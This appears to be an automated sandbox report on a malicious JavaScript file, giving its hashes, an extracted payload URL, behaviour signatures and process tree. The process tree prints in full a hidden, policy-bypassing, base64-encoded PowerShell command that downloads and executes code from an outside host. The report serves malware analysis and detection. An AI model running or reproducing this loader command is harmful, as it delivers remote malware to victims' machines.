Analysis
-
max time kernel
0s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
25/01/2024, 12:33
Static task
static1
Behavioral task
behavioral1
Sample
74b4be4968f0e61a067ffd34eab16060.js
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
74b4be4968f0e61a067ffd34eab16060.js
Resource
win10v2004-20231215-en
General
-
Target
74b4be4968f0e61a067ffd34eab16060.js
-
Size
88KB
-
MD5
74b4be4968f0e61a067ffd34eab16060
-
SHA1
0e5f7c3b490261645ff2dc9332fef3db3282c330
-
SHA256
b4ba46976e1aac036bb0a711054f65d5b50e5b9d3ce6d13d0262a1c540866053
-
SHA512
f5c31c3eb2661d7f35d8b1fb31fab90c9d917fb5967ee685935a800c8e35af12bab4afed529c94dae9992914793748e05df309a06c1defdff66fe23fad69e0e2
-
SSDEEP
1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/oZ:59Ry98guHVBqqg2bcruzUHmLKeMMU7G/
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2652 wrote to memory of 2996 2652 wscript.exe 26 PID 2652 wrote to memory of 2996 2652 wscript.exe 26 PID 2652 wrote to memory of 2996 2652 wscript.exe 26 PID 2996 wrote to memory of 3024 2996 cmd.exe 24 PID 2996 wrote to memory of 3024 2996 cmd.exe 24 PID 2996 wrote to memory of 3024 2996 cmd.exe 24
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\74b4be4968f0e61a067ffd34eab16060.js1⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA1⤵PID:3024